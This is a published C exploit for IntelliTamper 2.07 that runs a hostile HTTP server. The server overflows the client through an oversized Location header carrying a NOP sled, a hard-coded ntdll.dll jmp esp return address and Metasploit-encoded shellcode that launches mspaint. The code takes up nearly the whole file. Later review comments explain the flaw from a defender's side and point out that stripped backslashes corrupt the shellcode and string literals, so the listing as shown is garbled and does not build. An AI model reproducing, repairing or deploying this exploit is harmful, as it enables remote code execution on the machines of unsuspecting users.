
# Title : IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit
# Published : 2008-08-10
# Author : Wojciech Pawlikowski


/**
 **
 ** IntelliTamper 2.07 Location: HTTP Header Remote Code Execution exploit.
 **
 ** Based on exploit by Koshi (written in Perl). This one should be more
 ** stable. Just for fun and to learn more about win32 exploitation.
 **
 ** by Wojciech Pawlikowski (wojtekp@gmail.com)
 **/

#include <sys/types.h>
#include <sys/socket.h>

#include <arpa/inet.h>
#include <netinet/in.h>

#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

// Length of the oversized header value sent to the client; main() also sizes
// its request/response scratch buffers from this.
#define BUFSIZE					1550
// Single-byte x86 no-op used to pad the header value.
#define NOP					0x90
// Hard-coded absolute address; the trailing comment identifies it as a
// `jmp esp` inside ntdll.dll.  An address like this is valid only for the one
// ntdll.dll build it was taken from, so the payload is not portable across
// OS versions and is defeated by address-space randomisation of that module.
#define RETADDR					0x7c941EED	// jmp esp ntdll.dll

/* win32_exec -  EXITFUNC=thread CMD=mspaint Size=336 Encoder=Alpha2 http://metasploit.com */

// Encoded payload copied into the header value by main() (at offset 550).  Its
// generator, encoder and size are given by the comment above; nothing in this
// file decodes or inspects it.
// NOTE(review): as reproduced on this page the hex escapes appear to have lost
// their backslashes ("xeb", "x03", ...), so the array as shown is a run of
// ASCII letters and digits and does not hold the bytes the comment describes.
unsigned char shellcode[] =
   "xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
   "x49x48x49x49x49x49x49x49x49x49x49x49x51x5ax6ax42"
   "x58x30x42x31x50x41x42x6bx41x41x52x41x32x41x41x32"
   "x42x41x30x42x41x58x50x38x41x42x75x6dx39x59x6cx69"
   "x78x41x54x75x50x77x70x45x50x6cx4bx73x75x55x6cx4e"
   "x6bx61x6cx33x35x54x38x55x51x7ax4fx4cx4bx70x4fx45"
   "x48x4cx4bx33x6fx67x50x45x51x4ax4bx43x79x6cx4bx34"
   "x74x4cx4bx47x71x6ax4ex64x71x6fx30x5ax39x6ex4cx4e"
   "x64x4fx30x30x74x45x57x79x51x6bx7ax74x4dx37x71x5a"
   "x62x4ax4bx5ax54x55x6bx31x44x71x34x55x54x71x65x4b"
   "x55x6cx4bx73x6fx61x34x45x51x78x6bx65x36x6cx4bx36"
   "x6cx50x4bx4ex6bx71x4fx57x6cx35x51x38x6bx4cx4bx77"
   "x6cx6ex6bx77x71x6ax4bx4cx49x71x4cx37x54x34x44x7a"
   "x63x54x71x39x50x61x74x6cx4bx43x70x46x50x4bx35x49"
   "x50x72x58x46x6cx6cx4bx47x30x36x6cx6cx4bx70x70x37"
   "x6cx4ex4dx4cx4bx65x38x46x68x7ax4bx64x49x4ex6bx4f"
   "x70x6ex50x77x70x77x70x45x50x6cx4bx70x68x37x4cx63"
   "x6fx64x71x49x66x73x50x31x46x6ex69x59x68x4bx33x69"
   "x50x51x6bx30x50x32x48x5ax4fx5ax6ex69x70x45x30x33"
   "x58x4cx58x6bx4ex4cx4ax76x6ex66x37x6bx4fx7ax47x30"
   "x6dx53x43x62x50x53x51x73x59x32x4ex33x44x45x50x42";

/*
 * Entry point: a minimal TCP listener that plays the role of a hostile HTTP
 * server.  It binds port 80 on every interface; for each client that
 * connects it reads the request once, sends a single response whose
 * "Location:" header value is roughly BUFSIZE bytes of controlled data, and
 * closes the connection.  That header value is what the file header
 * describes as overflowing the vulnerable client.
 *
 * Defender's view: the client-side defect is a header value copied into a
 * fixed-size buffer without a length check; the artefact on the wire is an
 * HTTP response carrying a multi-kilobyte Location header made mostly of
 * NOP (0x90) bytes.  The fixed RETADDR ties the payload to one ntdll.dll
 * build, so randomising that module's base address alone breaks it.
 *
 * NOTE(review): as reproduced on this page the string literals appear to
 * have lost their backslashes ("n" where a newline is meant, "rn", "xe9"),
 * so the listing as shown does not build into the original program.
 *
 * Returns: never returns normally — the accept loop is infinite and every
 * fatal error path calls exit(-1); the final close(sockfd) is unreachable.
 */
int
main(void)
{
  struct sockaddr_in serv_sin, cli_sin;
  int i, sockfd, cli_sock, sock_opt = 1, sin_len;
  char *overflow, buf[BUFSIZE] = { 0 }, req[BUFSIZE + 100] = { 0 };
  
  sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
  if (sockfd < 0)
  {
    perror("socket()");
    exit(-1);
  }
  
  // serv_sin is never zeroed, so its padding (sin_zero) is whatever was on
  // the stack; only the three fields below are set.
  serv_sin.sin_family = AF_INET;
  serv_sin.sin_port = htons(80);
  serv_sin.sin_addr.s_addr = INADDR_ANY;
  
  if (setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, &sock_opt, sizeof(int)) < 0)
  {
    perror("setsockopt()");
    close(sockfd);
    exit(-1);
  }

  if (bind(sockfd, (struct sockaddr *)&serv_sin, sizeof(struct sockaddr)) < 0)
  {
    perror("bind()");
    close(sockfd);
    exit(-1);
  }    

  listen(sockfd, 1);	// return value unchecked
  sin_len = sizeof(struct sockaddr);	// accept() takes socklen_t *; an int * is passed

  printf("[*] Waiting for a connection...n");
  
  // Serve every client that connects; there is no exit condition.
  while (1)
  {
    cli_sock = accept(sockfd, (struct sockaddr *)&cli_sin, &sin_len);
    if (cli_sock < 0)
    {
      perror("accept()");
      exit(-1);
    }

    printf("[+] Connection from %s:%dn", inet_ntoa(cli_sin.sin_addr), ntohs(cli_sin.sin_port));

    // The request is read once and discarded; a short or failed read() is not
    // checked, and buf is never inspected.
    read(cli_sock, buf, sizeof(buf) - 1);
    // One heap buffer per connection, never freed (leaks BUFSIZE + 1 bytes per
    // client).  malloc() does not zero it, so bytes not written below keep
    // whatever the allocator left there.
    overflow = (char *)malloc(BUFSIZE + 1);
    
    // The header value is built in three overlapping passes.
    // Pass 1: store RETADDR every 4 bytes from offset 0 through 1540.  The
    // store goes through a long *, so where long is 8 bytes each store writes
    // 8 bytes and the last one reaches offset 1547 (still inside the
    // BUFSIZE + 1 allocation); the pointer cast also violates strict aliasing.
    for (i = 0; i <= 1540; i += 4)
      *(long *)&overflow[i] = RETADDR;

    // Pass 2: overwrite offsets 0..1535 with NOP, so RETADDR survives only from
    // offset 1536 onward.  i is 1536 when this loop ends.
    for (i = 0; i < 1536; i++)
      overflow[i] = NOP;

    // Pass 3: the payload goes at offset 550, inside the NOP run, and the
    // 5-byte sequence the original comment calls a jump back into the buffer
    // goes at offset i + 4 == 1540, right after the RETADDR copy at 1536.
    // strlen() is applied to an unsigned char array (implicit pointer
    // conversion); nothing here writes an explicit terminator after offset
    // 1544, so the later strlen(overflow) depends on what was already there.
    memcpy(overflow + 550, shellcode, strlen(shellcode));
    memcpy(overflow + i + 4, "xe9x14xfcxffxff", 5);			// jmp -1000 - jump to our buffer

    // Response prefix: status line, a fixed Date header and the "Location: "
    // header name.  Note the status line is written as "200 HTTP/1.1", i.e.
    // version and status code in the reverse of the order HTTP specifies.
    i = sprintf(req, "200 HTTP/1.1rnDate: 2008-07-24 20:14:31rnLocation: ");
    memcpy(req + i, overflow, strlen(overflow));
    memcpy(req + i + strlen(overflow), "rnrn", 4);	// end of headers (presumably CRLF CRLF originally)

    write(cli_sock, req, strlen(req));	// partial write / error not checked

    printf("[+] Exploit sent!n");

    close(cli_sock);
  }

  close(sockfd);	// unreachable: the loop above never terminates
}
